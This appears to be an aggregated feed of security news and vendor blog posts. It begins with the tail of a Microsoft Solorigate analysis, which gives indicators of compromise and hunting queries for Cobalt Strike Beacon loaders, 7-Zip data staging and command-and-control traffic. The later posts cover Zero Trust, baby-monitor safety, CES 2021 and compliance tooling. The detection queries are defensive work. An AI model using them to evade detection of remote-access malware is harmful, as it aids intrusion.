  • User and IP address reconnaissance (SMB)
  • Suspected Kerberos SPN exposure

Figure 11. Alert raised by Microsoft Defender for Endpoint on Solorigate-related malicious activity in June 2020

The disclosure of the Solorigate attack and the investigations that followed unearthed more details and intelligence that we used to improve existing detections and build new ones. Security operations teams looking to get a comprehensive guide on detecting and investigating Solorigate can refer to Using Microsoft 365 Defender to protect against Solorigate.

Meanwhile, security administrators can use the recommendations for hardening networks against Solorigate and similar sophisticated cyberattacks outlined in Increasing resilience against Solorigate and other sophisticated attacks with Microsoft Defender.

To get the latest information and guidance from Microsoft, visit


Microsoft 365 Defender Research Team

Microsoft Threat Intelligence Center (MSTIC)

Microsoft Cyber Defense Operations Center (CDOC)


Indicators of compromise (IoCs)

Custom Cobalt Strike Beacon loader (SHA-256):


File paths for the custom Cobalt Strike Beacon loader:


Cobalt Strike Beacon:


Advanced hunting queries

A collection of Advanced Hunting Queries (AHQ) related to Solorigate is located in our AHQ repository in GitHub. To locate possible exploitation activity related to the contents of this blog, you can run the following advanced hunting queries via Microsoft Defender for Endpoint:

Anomalous usage of 7zip

Look for anomalous usage or running process of 7zip. Run query in Microsoft Defender for Endpoint.

| where InitiatingProcessFileName in~("rundll32.exe", "dllhost.exe") and InitiatingProcessCommandLine != "" and InitiatingProcessCommandLine !contains " "
| extend RundllTime = Timestamp
| join DeviceProcessEvents on $left.DeviceId == $right.DeviceId
| where InitiatingProcessFileName hasprefix "7z" or InitiatingProcessCommandLine has "-mx9"
| extend DateDiff = datetime_diff("day", Timestamp, RundllTime)
| where DateDiff < 2

Presence of custom Cobalt Strike

Look for presence of custom cobalt strike loaders. Run query in Microsoft Defender for Endpoint.

| where FileName =~ "rundll32.exe"
| where InitiatingProcessIntegrityLevel in ("High", "System")
| where ProcessCommandLine matches regex @'(?i)rundll32\s+c\:\\windows(\\[^\\]+)+\.dll\s+[a-zA-Z0-9_]{3,}'

Command and control

Look for command-and-control connections. Run query in Microsoft Defender for Endpoint.

| where InitiatingProcessParentFileName =~ "rundll32.exe"
| where InitiatingProcessFileName =~ "dllhost.exe" and InitiatingProcessCommandLine != "" and InitiatingProcessCommandLine !contains " "

Look for network connections to known command and control domains. Run query in Microsoft Defender for Endpoint.

| where RemoteUrl in~('',


The post Deep dive into the Solorigate second-stage activation: From SUNBURST to TEARDROP and Raindrop appeared first on Microsoft Security.

Malwarebytes was breached by the SolarWinds attackers

A fourth malware strain wielded by the SolarWinds attackers has been detailed by Symantec researchers, followed by the disclosure of the attackers’ ingenous lateral movement techniques and the release of an auditing script by FireEye researchers that organizations can use to check their Microsoft 365 tenants for signs of intrusion. Then, on Tuesday, Malwarebytes CEO Marcin Kleczynski disclosed that the same attackers targeted and breached the company, but not through the compromised SolarWinds Orion platform … More

The post Malwarebytes was breached by the SolarWinds attackers appeared first on Help Net Security.

Does your cloud stack move faster than your cloud security solutions?

According to Gartner, worldwide end-user spending on public cloud services is forecasted to grow by 18.4% in 2021 to a total of $304.9 billion, up from $257.5 billion in 2020. “The pandemic validated the cloud’s value proposition,” said Sid Nag, research vice president at Gartner. “The ability to use on-demand, scalable cloud models to achieve cost efficiency and business continuity is providing the impetus for organizations to rapidly accelerate their digital business transformation plans.” From … More

The post Does your cloud stack move faster than your cloud security solutions? appeared first on Help Net Security.

Protecting the remote workforce to be enterprises’ prime focus in 2021

Protecting the remote workforce will be enterprises’ prime focus in 2021, according to a Cato Networks survey of 2,376 IT leaders. IT teams struggled in the early days of the pandemic, rushing to meet the urgent need for widespread remote access. Connecting users often came at the expense of other factors, such as security, performance, and management. As 81% of respondents expect to continue working-from-home (WFH), 2021 will see enterprises address those other areas, evolving … More

The post Protecting the remote workforce to be enterprises’ prime focus in 2021 appeared first on Help Net Security.

Companies turning to MSPs as attack vectors get more sophisticated

Research from Infrascale reveals new information security insights important to MSPs in the new year. The research survey highlights business executive input, from a security perspective, on COVID-19, on cloud adoption, and on standards compliance. As 65% of those surveyed have seen an increase in information security breaches in their industry since the pandemic began, it’s not surprising that even more, 74% of all respondents, have chosen caution and implemented new infosec technology. A robust … More

The post Companies turning to MSPs as attack vectors get more sophisticated appeared first on Help Net Security.

Using Zero Trust principles to protect against sophisticated attacks like Solorigate

The Solorigate supply chain attack has captured the focus of the world over the last month. This attack was simultaneously sophisticated and ordinary. The actor demonstrated sophistication in the breadth of tactics used to penetrate, expand across, and persist in affected infrastructure, but many of the tactics, techniques, and procedures (TTPs) were individually ordinary.

Companies operating with a Zero Trust mentality across their entire environment are more resilient, consistent, and responsive to new attacks—Solorigate is no different. As threats increase in sophistication, Zero Trust matters more than ever, but gaps in the application of the principles—such as unprotected devices, weak passwords, and gaps in multi-factor authentication (MFA) coverage can be exploited by actors.

Zero Trust Principles

Applying Zero Trust

Zero Trust in practical terms is a transition from implicit trust—assuming that everything inside a corporate network is safe—to the model that assumes breach and explicitly verifies the security status of identity, endpoint, network, and other resources based on all available signals and data. It relies on contextual real-time policy enforcement to achieve least privileged access and minimize risks. Automation and Machine Learning are used to enable rapid detection, prevention, and remediation of attacks using behavior analytics and large datasets.

Zero Trust Policy

Verify explicitly

To verify explicitly means we should examine all pertinent aspects of access requests instead of assuming trust based on a weak assurance like network location. Examine the identity, endpoint, network, and resource then apply threat intelligence and analytics to assess the context of each access request.

When we look at how attackers compromised identity environments with Solorigate, there were three major vectors: compromised user accounts, compromised vendor accounts, and compromised vendor software. In each of these cases, we can clearly see where the attacker exploited gaps in explicit verification.

  • Where user accounts were compromised, known techniques like password spray, phishing, or malware were used to compromise user credentials and gave the attacker critical access to the customer network. On-premises identity systems are more vulnerable to these common attacks because they lack cloud-powered protections like password protection, recent advances in password spray detection, or enhanced AI for account compromise prevention.
  • Again, in cases where the actor succeeded, highly privileged vendor accounts lacked protections such as MFA, IP range restrictions, device compliance, or access reviews. In other cases, user accounts designated for use with vendor software were configured without MFA or policy restrictions. Vendor accounts should be configured and managed with the same rigor as used for the accounts which belong to the organization.
  • Even in the worst case of SAML token forgery, excessive user permissions and missing device and network policy restrictions allowed the attacks to progress. The first principle of Zero Trust is to verify explicitly—be sure you extend this verification to all access requests, even those from vendors and especially those from on-premises environments.

Cloud identity, like Azure Active Directory (Azure AD), is simpler and safer than federating with on-premises identity. Not only is it easier to maintain (fewer moving parts for attackers to exploit), your Zero Trust policy should be informed by cloud intelligence. Our ability to reason over more than eight trillion signals a day across the Microsoft estate coupled with advanced analytics allows for the detection of anomalies that are very subtle and only detectable in very large data sets. User history, organization history, threat intelligence, and real-time observations are an essential mechanism in a modern defense strategy. Enhance this signal with endpoint health and compliance, device compliance policies, app protection policies, session monitoring, and control, and resource sensitivity to get to a Zero Trust verification posture.

For customers that use federation services today, we continue to develop tools to simplify migration to Azure AD. Start by discovering the apps that you have and analyzing migration work using Azure AD Connect health and activity reports.

Least privileged access

Zero Trust: Microsoft Step by Step

Least privileged access helps ensure that permissions are only granted to meet specific business goals from the appropriate environment and on appropriate devices. This minimizes the attacker’s opportunities for lateral movement by granting access in the appropriate security context and after applying the correct controls—including strong authentication, session limitations, or human approvals and processes. The goal is to compartmentalize attacks by limiting how much any compromised resource (user, device, or network) can access others in the environment.

With Solorigate, the attackers took advantage of broad role assignments, permissions that exceeded role requirements, and in some cases abandoned accounts and applications which should have had no permissions at all. Conversely, customers with good least-privileged access policies such as using Privileged Access Workstations (PAW) devices were able to protect key resources even in the face of initial network access by the attackers.

Assume breach

Our final principle is to Assume Breach, building our processes and systems assuming that a breach has already happened or soon will. This means using redundant security mechanisms, collecting system telemetry, using it to detect anomalies, and wherever possible, connecting that insight to automation to allow you to prevent, respond and remediate in near-real-time.

Sophisticated analysis of anomalies in customer environments was key to detecting this complex attack. Customers that used rich cloud analytics and automation capabilities, such as those provided in Microsoft 365 Defender, were able to rapidly assess attacker behavior and begin their eviction and remediation procedures.

Importantly, organizations such as Microsoft who do not model “security through obscurity” but instead model as though the attacker is already observing them are able to have more confidence that mitigations are already in place because threat models assume attacker intrusions.

Summary and recommendations

It bears repeating that Solorigate is a truly significant and advanced attack. However ultimately, the attacker techniques observed in this incident can be significantly reduced in risk or mitigated by the application of known security best practices. For organizations—including Microsoft—thorough application of a Zero Trust security model provided meaningful protection against even this advanced attacker.

To apply the lessons from the Solorigate attack and the principles of Zero Trust that can help protect and defend, get started with these recommendations:

  1. More than any other single step, enable MFA to reduce account compromise probability by more than 99.9 percent. This is so important, we made Azure AD MFA free for any Microsoft customer using a subscription of a commercial online service.
  2. Configure for Zero Trust using our Zero Trust Deployment Guides.
  3. Look at our Identity workbook for Solorigate.

Stay safe out there.

Alex Weinert

For more information about Microsoft Zero Trust please visit our website. Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity.

The post Using Zero Trust principles to protect against sophisticated attacks like Solorigate appeared first on Microsoft Security.

The Connected Lives of Babies: Protecting First Footprints in the Digital World, Part 1

Digital from birth

The Connected Lives of Babies: Protecting The First Footprints in the Digital World, Part One

A baby can leave their first footprints internet even before they’re born.

The fact is that children start creating an identity online before they even put a little pinky on a device, let alone come home for the first time. That “Hello, world!” moment can come much, much sooner. And it will come from you.

From posting baby’s ultrasound pic to sharing a video of the gender reveal celebration, these are the first digital footprints that your child will make. With your help, of course, because it’s you who’ll snap all those photos, capture all those videos, and share many of them on the internet. Yet even though you’re the one who took them, those digital footprints you’ve created belong to your child.

And that’s something for us to pause and consider during this wonderful (and challenging!) stretch of early parenthood. Just as we look out for our children’s well-being in every other aspect of their little lives, we must look out for their digital well-being too. Babies are entitled to privacy too. And their little digital lives need to be protected as well.

The connected lives of babies

Babies lives are more connected than you might think. Above and beyond the social media posts we make to commemorate all their “firsts,” from first solid food to first steps, there’s digital information that’s associated with your child as well. Things like Social Security Numbers, medical records, and even financial records related to them all exist, all of which need to be protected just like we protect that same digital information as adults.

Likewise, there’s all manner of connected devices like Wi-Fi baby monitors, baby sleep monitors, even smart cribs that sense restlessness in your baby and then rocks and soothes those little cares away. Or how about a smart changing table that tracks the weight of your child over time? You and your baby may make use of those. And because all these things are connected, they have to be protected.

This is the first of two articles that takes a look at this topic, and we’ll start with a look at making good choice about purchasing “smart devices” and connected baby monitors—each pieces of technology that parents should investigate before bringing them into their home or nursery.

Buying smart devices for baby, Part One: Connect with your care provider

As a new parent, or as a parent who’s just added another tyke to the nest, you’ll know just how many products are designed for your baby—and then marketed toward your fears or concerns. Before buying such smart devices, read reviews and speak with your health care provider to get the facts.

For example, you can purchase connected monitors that track metrics like baby’s breathing, heart rate, and blood-oxygen levels while they sleep. While they’re often presented as a means of providing peace of mind, the question to ask is what that biometric information can really do for you. This is where your health care provider can come in, because if you have concerns about Sudden Infant Death Syndrome (SIDS), that’s a much larger conversation. Your provider can discuss the topic with you about and whether such a device is an effective measure for your child.

Buying smart devices for baby, Part Two: Do your security research

Another question to ask is what’s done with the biometric data that such devices monitor. Is it kept on your smartphone, or is it stored in the cloud by the device manufacturer? Is that storage secure? Is the data shared with any third parties? Who owns that data? Can you opt in or opt out of sharing it? Can you access and delete it as needed? Your baby’s biometrics are highly personal info and must be protected as such. Without clear-cut answers about how your baby’s data is handled, you should consider giving that device a hard pass.

How do you get those answers? This is another instance where you’ll have to roll up your sleeves and read the privacy policy associated with the device or service in question. And as it is with privacy policies, some are written far more clearly and concisely than others. The information is in there. You may have to dig for it. (Of note, there are instances where parents consented to the use of their data for the purposes of government research, such as this study published by the U.S. National Institutes of Health.)

Related, here’s the advice I share on every connected “smart” device out there, from baby-related items to smart refrigerators: before you purchase, read up on reviews and comments from other customers. Look for news articles about the device manufacturer too. The fact of the matter is that some smart device manufacturers are much better at baking security protocols into their devices than others, so investigate their track record to see if you can uncover any issues with their products or security practices. Information such as this can help you make an even more informed choice.

Secure your Wi-Fi baby monitor (and other smart devices too)

An online search for “hacked baby monitor” will quickly call up several unsettling stories about hackers tuning into Wi-Fi baby monitors—scanning the camera about the room at will and perhaps even speaking directly to the child. Often, this is because the default factory password has not been changed by the parents. And a “default password” may as well be “public password” because lists of default passwords for connected devices are freely available on the internet. In fact, researchers from Ben Gurion University looked at the basic security of off-the-shelf smart devices found that, “It only took 30 minutes to find passwords for most of the devices and some of them were found only through a Google search of the brand.”

The three things you can do to prevent this from happening to your Wi-Fi baby monitor, along with other connected devices around your home, are:

  1. Change the default password. Use a strong and unique password for your baby monitor and other devices.
  2. Update. Check regularly for device updates, as they often harden the security of the device in addition to adding performance upgrades.
  • Use two-factor authentication if available. This, in addition to a password, offers an extra layer of protection that makes a device far more difficult to hack.

What about “old-style” baby monitors that work on a radio frequency (RF) like a walkie-talkie does? Given that they’re not connected to the internet, there’s less risk involved. That’s because hacking into an RF monitor requires a per person to be in close physical proximity to the device and have access to the same broadcast frequency as your device—a far less likely proposition, yet a risk none the less. Some modern RF baby monitors even encrypt the radio signal, mitigating that much more risk.

And now, let’s talk about online privacy for babies and children

Next up, we’ll take a closer look at baby’s privacy online. Yes, that’s a thing! And an important one at that, as taking charge of their privacy right now can protect them from cybercrime and harm as they get older.

Stay Updated 

To stay updated on all things McAfee and for more resources on staying secure from home, follow @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.


The post The Connected Lives of Babies: Protecting First Footprints in the Digital World, Part 1 appeared first on McAfee Blogs.

Security is everyone’s priority

By Dana Mitchell, Director, Cybersecurity Solutions Group, Microsoft Canada Digital transformation, cloud computing and a sophisticated threat landscape are forcing everyone to rethink the roles that each individual within an organization has in defending against cyber threats. With billions of people around the globe working from home, changes to the daily practice of cybersecurity are…

The post Security is everyone’s priority first appeared on IT World Canada.

How IT leaders are securing identities with Zero Trust

The past twelve months have been a remarkable time of digital transformation as organizations, and especially digital security teams, adapt to working remotely and shifting business operations. IT leaders everywhere turned to Zero Trust approaches to alleviate the challenges of enabling and securing remote work. Using Zero Trust to secure users, data, and devices (wherever they may be) has changed from optional to a business imperative overnight.

In this short report, we surveyed IT leaders around the world to determine how they’re implementing Zero Trust practices to protect their identities and ensure their employees have secure access to resources.A clickable link to the full PDF infographic to the Zero Trust whitepaper

  1. Most IT leaders are already using Zero Trust practices with their identity management solutions. While the majority of IT leaders have already implemented Zero Trust practices into their identity and access solution, only a monitory have moved on to more advanced controls that utilize automation and AI-based threat analysis.
  2. Multi-factor authentication (MFA) and Single Sign-On (SSO) are the most common. Additionally, a majority are analyzing risk before granting access—a critical proactive step to preventing unauthorized access to corporate resources.
  3. Identities and devices are the top priority for most organizations. With employees working outside the corporate network and increasingly using personal devices, this is no surprise. However, surprisingly, the majority of IT leaders do not rate identities as the most mature component in their Zero Trust strategy.
  4. Zero Trust is still in infancy. Despite substantial growth in Zero Trust efforts over the past twelve months, only one in ten IT leaders report feeling very confident in their Zero Trust identity management roadmap.

Read the full report for more details.

If you’re looking for how to help prevent endpoints from being the weakest link in your security strategy, check out our Zero Trust deployment guidance for identities.

To learn more about Microsoft Security solutions visit our website.  Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity.

The post How IT leaders are securing identities with Zero Trust appeared first on Microsoft Security.

Rethinking Active Directory security

In the wake of a cyberattack, Active Directory is sometimes dismissed as just another service that needs to be recovered, and security is an afterthought. But the hard reality is that if Active Directory is compromised, so is your entire environment. 90% of organizations use Active Directory as their primary store for employee authentication, identity management, and access control. Today, it’s becoming more common for organizations to take a hybrid approach to identity and focus … More

The post Rethinking Active Directory security appeared first on Help Net Security.

Are you vetting your MSSPs?

Enterprises were already moving toward digital transformations at the start of 2020, but the COVID-19 pandemic suddenly threw everything into high gear. Telework, virtual meetings and a host of online transactions – from retail purchases and food ordering to interviewing and onboarding employees – went from being occasional occurrences to being the norm. With enterprises using the cloud for more and more of their operations, the adoption of “as-a-Service” offerings has grown swiftly in nearly … More

The post Are you vetting your MSSPs? appeared first on Help Net Security.

Product showcase: Pentest Robots

Security testing automation is not about building tech to replace humans. We don’t adhere to that limiting view because it fails to capture the complexity and depth of security testing. Instead, we believe automation should enhance uniquely human abilities such as critical thinking and subjective judgment. A good pentester can never be replaced by a robot. But a robot can make them exponentially more effective. Here’s what we mean. How Pentest Robots work Security pros … More

The post Product showcase: Pentest Robots appeared first on Help Net Security.

Visibility, control and governance holding back cloud transformation

While 91% of organizations were successful in increasing security as a result of adopting cloud services, it remains a top concern for many, a part two of an Aptum study reveals. The report identifies common security, compliance and governance challenges impacting organizations undergoing cloud transformation. The research reveals that 51% of survey respondents see security as the main driver behind cloud adoption. However, 38% cite security and data protection as the primary barrier to cloud … More

The post Visibility, control and governance holding back cloud transformation appeared first on Help Net Security.

Worldwide SD-WAN market to reach valuation of $53 billion by end of 2030

A software-defined wide area network is a type of computer network that allows the bounding of multiple internet access resources, such as cables, digital subscriber lines (DSL), and cellular or any other IP transport to provide high throughput data channels. WAN solutions improve application performance, reducing costs, increasing agility, and addressing various IT challenges. Enterprises are adopting SD-WAN solutions for threat protection, efficient offloading of expensive circuits, and simplification of WAN network management. IT infrastructure … More

The post Worldwide SD-WAN market to reach valuation of $53 billion by end of 2030 appeared first on Help Net Security.

How to defend against today’s top 5 cyber threats

Cyber threats are constantly evolving. As recently as 2016, Trojan malware accounted for nearly 50% of all breaches. Today, they are responsible for less than seven percent. That’s not to say that Trojans are any less harmful. According to the 2020 Verizon Data Breach Investigations Report (DBIR), their backdoor and remote-control capabilities are still used by advanced threat actors to conduct sophisticated attacks. Staying ahead of evolving threats is a challenge that keeps many IT … More

The post How to defend against today’s top 5 cyber threats appeared first on Help Net Security.

Rob Joyce is the new NSA Cyber Director

The U.S. National Security Agency has appointed Rob Joyce as the agency’s new director of cybersecurity, who has long experience in US cybersecurity

The National Security Agency (NSA) has appointed US cybersecurity official Rob Joyce as the new chief of the Cybersecurity Directorate. Joyce served as the NSA’s top representative in the UK since 2018, he is the successor of Anne Neuberger, who recently appointed Deputy National Security Advisor for Cyber and Emerging Technology for the National Security Council (NSC). Neuberger was the director of the directorate since its creation in 2019.

Joyce also served as senior advisor to the NSA director on cybersecurity strategy.

Joyce has previously held other roles at the NSA, including chief of Tailored Access Operations (TAO), now Computer Network Operations, which is a cyber-warfare intelligence-gathering unit of the National Security Agency (NSA).

Rob Joyce also served as deputy director of the Information Assurance Directorate (IAD).

If you want to receive the weekly Security Affairs Newsletter for free subscribe here.

Pierluigi Paganini

(SecurityAffairs – hacking, NSA)

The post Rob Joyce is the new NSA Cyber Director appeared first on Security Affairs.

Vulnerability management isn’t working for cloud security: Here’s how to do it right

Three things in life are seemingly guaranteed: death, taxes and high-profile cloud security breaches. But there is no reason why public cloud or hybrid cloud breaches must remain so stubbornly persistent. The fact is that we understand why these incidents keep occurring: managing risk and vulnerabilities within dynamic cloud environments isn’t easy. The difficulty of this challenge is magnified by the competitive imperative to migrate to the public cloud quickly. It is further compounded by … More

The post Vulnerability management isn’t working for cloud security: Here’s how to do it right appeared first on Help Net Security.

How do I select a fraud detection solution for my business?

The rapid increase in digital use created a perfect storm for fraudsters to quickly find new ways to steal funds, capitalizing on consumers’ lack of familiarity with digital platforms and the resource constraints faced by many businesses. In fact, from January 2020 to early January 2021, the Federal Trade Commission released that consumers reported over 275,000 complaints resulting in more than $210 million in COVID-19-related fraud loss. Because of this, it’s critical for businesses to … More

The post How do I select a fraud detection solution for my business? appeared first on Help Net Security.

Enterprises move on from legacy approaches to software development

Application development and maintenance services in the U.S. are evolving to meet changing demands from enterprises that need dynamic applications with rich user interfaces, according to a report published by Information Services Group. The report for the U.S. finds the growing ranks of companies undergoing digital transformation want to modernize their software portfolios and continuously update their applications. Meeting requirements through next-generation ADM services Service providers are meeting these requirements through next-generation ADM services, which … More

The post Enterprises move on from legacy approaches to software development appeared first on Help Net Security.

Malware incidents on remote devices increase

52% of organizations experienced a malware incident on remote devices in 2020, up from 37% in 2019, a Wandera report reveals. Of devices compromised by malware in 2020, 37% continued accessing corporate emails after being compromised and 11% continued accessing cloud storage, highlighting a need for organizations to better determine how to configure business tools to ensure fast and safe connectivity for all users in 2021. Other findings In 2020, 28% of organizations were regularly … More

The post Malware incidents on remote devices increase appeared first on Help Net Security.

Is XDR the answer to simplify security?

Extended detection and response (XDR) is gaining momentum as the next big thing to simplify and improve security. The term, coined by Gartner, refers to a platform that provides unified visibility across all security products to make it easier to quickly spot and resolve threats. Security leaders say they’re overwhelmed with managing the myriad of…

The post Is XDR the answer to simplify security? first appeared on IT World Canada.

CES 2021: Highlights From the “Cleanest” Show Yet!

CES 2021

Typically, the International Consumer Electronics Show (CES) gives us a sense of where technology is going in the future. However, this year’s show was arguably more about technology catching up with how the COVID-19 pandemic has reshaped our lives. While gathering in person was not an option, we still had the opportunity to witness incredible technological feats virtually – primarily those meant to help us better adapt to the new normal.
From devices aimed at making the world more sanitary to new work-from-home solutions, here are some of the highlights from this year’s first ever virtual CES:

Extreme Home Makeover: Digital Edition

Every year, CES introduces a plethora of smart home devices aimed at making our lives easier. But now that our homes have expanded beyond where we live to function as a workplace and classroom, companies have developed new gadgets to improve our lives while we stay at home. In fact, the smart home market grew 6.7% from 2019 to 2020 to $88 billion and is expected to reach $246.42 billion by 2025.

This year, Kohler showed off voice control features for its sinks and other fixtures, so homeowners can turn on faucets without touching them. And while every CES is paved with an array of flashy new TVs, LG drummed up lots of excitement with its new 55-inch transparent TV that you can see through when it’s turned off.

From monitors to keyboards and Wi-Fi upgrades to charging stations, plenty of the gadgets coming out of this year’s show were designed to improve the remote work experience. Take Dell’s UltraSharp 40-inch Curved Ultrawide U4021QW Monitor, for example. Ultrawide is the functional equivalent of two 4K monitors side-by-side, but without the seam. Belkin and Satechi also brought their latest charging stations to CES 2021 to improve the home office, allowing users to charge multiple devices at once. With so many companies creating innovative devices to make our work-from-home lives more manageable in the long run, it’s clear that remote work is likely here to stay.

Staying Healthy at Home in Global Health Crisis

CES 2021 also brought us a whole new lineup of technology designed to help us monitor our health at home. Fluo Labs debuted Flō, a device that stops your body from releasing histamines when pollen, dust, and other allergens enter your body. HD Medical also introduced HealthyU, a device smaller than a GoPro that includes a seven-lead ECG, a temperature sensor, a pulse oximeter, microphones to record heart and lung sounds, a heart rate monitor, and a blood pressure sensor. HealthyU is designed for people with heart issues to keep tabs on their health every day and send that information to their doctors remotely. Not only will these devices enable us to take better care of ourselves if we can’t physically go to a doctor’s office, but they will also enhance our awareness of ourselves and our loved ones.

Touchless Tech is on the Rise

In 2020, we became hyper-aware of germs and how they can easily spread – one of those ways being on digital devices. While disinfecting these surfaces with an alcohol solution can help, many look to taking a different approach to avoid germ-spreading: touchless technology.

While no one technology can win the battle against the virus, many companies are doing their part to promote a cleaner, healthier future. For example, Plott built a doorbell called the Ettie that can take people’s temperature before they’re allowed to enter. Another company,, created a Touchless Video Doorbell to cut down on the transmission of bacteria and viruses that we otherwise often leave on places we touch. Kohler also built a toilet that flushes with the wave of a hand. As we head further into 2021 and beyond, be on the lookout for more voice-activated and touchless devices to help slow the spread of germs and help us live our lives free from worry.

Adapt to the Cybersecurity Landscape in a Hyper-Connected World

We’ve become more reliant on technology than ever before to stay connected with loved ones from afar, work from home without missing a beat, participate in distance learning, and find new forms of digital entertainment. But with this increase in time spent online comes a greater risk of cyberthreats, and we must stay vigilant when it comes to protecting our online safety. Hackers continue to adapt their techniques to take advantage of users spending more time online, so we must educate and protect ourselves and our devices from emerging threats. This way, we can continue to embrace new technologies, while we live our digital lives free from worry.

Stay Updated

To stay updated on all things McAfee and on top of the latest consumer and mobile security threats, follow @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

The post CES 2021: Highlights From the “Cleanest” Show Yet! appeared first on McAfee Blogs.

What analytics can unveil about bot mitigation tactics

25% of internet traffic on any given day is made up of bots, the Kasada Research Team has found. In fact, there is a synthetic counterpart for almost every human interaction online. Bot mitigation tactics These bots work to expose and take advantage of vulnerabilities at a rapid pace, stealing critical personal and financial data, scraping intellectual property, installing malware, contributing to DDoS attacks, distorting web analytics and damaging SEO. Luckily, tools, approaches, solutions and … More

The post What analytics can unveil about bot mitigation tactics appeared first on Help Net Security.

Understanding third-party hacks in the aftermath of the SolarWinds breach

In the aftermath of the SolarWinds hack, a better understanding of third-party hacks in any update that you provide to your colleagues, bosses, and even the board of directors may be warranted. Any such update that you provide on SolarWinds should certainly cover whether or not your organization is one of the 300,000 SolarWinds customers and whether or not you were one of the 18,000 or so that were using the specific version of Orion … More

The post Understanding third-party hacks in the aftermath of the SolarWinds breach appeared first on Help Net Security.

Fraudulent attempt purchase value decreased by $10 in 2020 compared to 2019

There has been a 24 percent increase in eCommerce transactions globally in December 2020 compared to December 2019, ACI Worldwide reveals. In particular, eCommerce transactions in the retail sector increased 31 percent and the gaming sector increased 90 percent, comparing December 2020 with December 2019. BOPIS fraud also seeing a significant increase While many merchants initially implemented the buy online, pick up in store (BOPIS) delivery channel during the pandemic, those that already had this … More

The post Fraudulent attempt purchase value decreased by $10 in 2020 compared to 2019 appeared first on Help Net Security.

Simplify compliance and manage risk with Microsoft Compliance Manager

The cost of non-compliance is more than twice that of compliance costs. Non-compliance with the ever-increasing and changing regulatory requirements can have a significant impact on your organization’s brand, reputation, and revenue. According to a study by the Ponemon Institute and Globalscape, being compliant will cost you less compared to business disruptions, loss of revenue, and hefty fines.

Data explosion and regulatory environment

As organizations go through digital transformation, they are generating and consuming much more data than in the past to help them gain an edge over their competitors. This data is necessary to continue to stay relevant by empowering employees, engaging customers, and optimizing operations. Managing this data and the variety of devices on which it is created can be complicated, especially when it comes to ensuring compliance.

Not only is the amount of data IT must manage exploding, regulations on how that data can and should be handled are also increasing. Collecting customer and citizen data is often an integral part of how public and private sector organizations function. While there has been progress over the last few years, the challenge of maintaining and protecting personal data continues. Regulations are creating a need for the responsible usage of personal data, and the stakes are high. Not complying with regulations can result in significant fines and reduced credibility with regulators, customers, and citizens.

Manage compliance challenges

According to a recent report about the cost of compliance, there were more than 215 regulation updates a day from over 1,000 regulatory bodies all over the world, a slight decrease from the previous year. For example, enforcement of the California Consumer Privacy Act (CCPA), Brazil’s Lei Geral de Proteção de Dados (LGPD), and Thailand’s Personal Data Protection Act (PDPA) began in 2020.

Organizations face all kinds of risks, including financial, legal, people, IT, and cybersecurity risks. Below are some of the challenges we are seeing due to the dynamic nature of the compliance landscape.

  • Keeping up with constantly changing regulations is a struggle. With all the regulatory and standards bodies creating new or revising existing requirements and guidelines, keeping up to date is time and resource-intensive.
  • Point-in-time assessments create a digital blind spot. Many organizations rely on point-in-time assessments, like annual audits. Unfortunately, they can go out of date quickly and expose the organization to potential risks until the next assessment is done. Organizations are looking for ways to improve integration and create near real-time assessments to control risks caused by digital assets.
  • Inefficient collaboration and siloed knowledge lead to duplication of effort. Organizations are often challenged due to siloed knowledge concerning IT risk management. IT and security admins know the technology solutions but find regulations difficult to understand. Contrast that with compliance, privacy, and legal teams who tend to be familiar with the regulations but are not experts in the technology available to help them comply. In addition, many organizations start their compliance journey using general-purpose tools like Microsoft Excel and try to track compliance manually, but quickly outgrow this approach because of the complexities of managing compliance activities.
  • Complexity across IT environments hinders adoption. Understanding how to integrate the many solutions available and configure each one to minimize compliance risks can be difficult. This is especially true in organizations with solutions sourced from multiple vendors that often have overlapping functionality. Decision-makers want simple step-by-step guidance on how to make the tools work for the industry standards and regulations they are subject to.

Simplify compliance with Microsoft Compliance Manager

Microsoft Compliance Manager is the end-to-end compliance management solution included in the Microsoft 365 compliance center. It empowers organizations to simplify compliance, reduce risk, and meet global, industry, and regional compliance regulations and standards. Compliance Manager translates complicated regulations, standards, company policies, and other desired control frameworks into simple language, maps regulatory controls and recommended improvement actions, and provides step-by-step guidance on how to implement those actions to meet regulatory requirements. Compliance Manager helps customers prioritize work by associating a score with each action, which accrues to an overall compliance score. Compliance Manager provides the following benefits:

  • Pre-built assessments for common industry and regional standards and regulations, and custom assessments to meet your unique compliance needs. Assessments are available depending on your licensing agreement.
  • Workflow functionality to help you efficiently complete risk assessments.
  • Detailed guidance on actions you can take to improve your level of compliance with the standards and regulations most relevant for your organization.
  • Risk-based compliance score to help you understand your compliance posture by measuring your progress completing improvement actions.

Shared responsibility

For organizations running their workloads only on-premises, they are 100 percent responsible for implementing the controls necessary to comply with standards and regulations. With cloud-based services, such as Microsoft 365, that responsibility becomes shared between your organization and the cloud provider, although is ultimately responsible for the security and compliance of their data.

Microsoft manages controls relating to physical infrastructure, security, and networking with a software as a service (SaaS) offering like Microsoft 365. Organizations no longer need to spend resources building datacenters or setting up network controls. With this model, organizations manage the risk for data classification and accountability. And risk management is shared in certain areas like identity and access management. The chart below is an example of how responsibility is shared between the cloud customer and cloud provider with various on-premises and online services models.

shows the Shared responsibility model

Figure 1: Shared responsibility model

Apply a shared responsibility model

Because responsibility is shared, transitioning your IT infrastructure from on-premises to a cloud-based service like Microsoft 365 significantly reduces your burden of complying with regulations. Take the United States National Institute of Standards and Technology’s NIST 800-53 regulation as an example. It is one of the largest and most stringent security and data protection control frameworks used by the United States government and large organizations. If your organization were adhering to this standard and using Microsoft 365, Microsoft would be responsible for managing more than 75 percent of the 500 plus controls. You would only need to focus on implementing and maintaining the controls not managed by Microsoft. Contrast that situation with one where your organization was running 100 percent on-premises. In that case, your organization would need to implement and maintain all the NIST 800-53 controls on your own. The time and cost savings managing your IT portfolio under the shared responsibility model can be substantial.

shows the NIST examples of shared responsibilities

Figure 2: NIST examples of shared responsibilities

Assess your compliance with a compliance score

Compliance Manager helps you prioritize which actions to focus on to improve your overall compliance posture by calculating your compliance score. The extent to which an improvement action impacts your compliance score depends on the relative risk it represents. Points are awarded based on whether the action risk level has been identified as a combination of the following action characteristics:

  • Mandatory or discretionary.
  • Preventative, detective, or corrective.

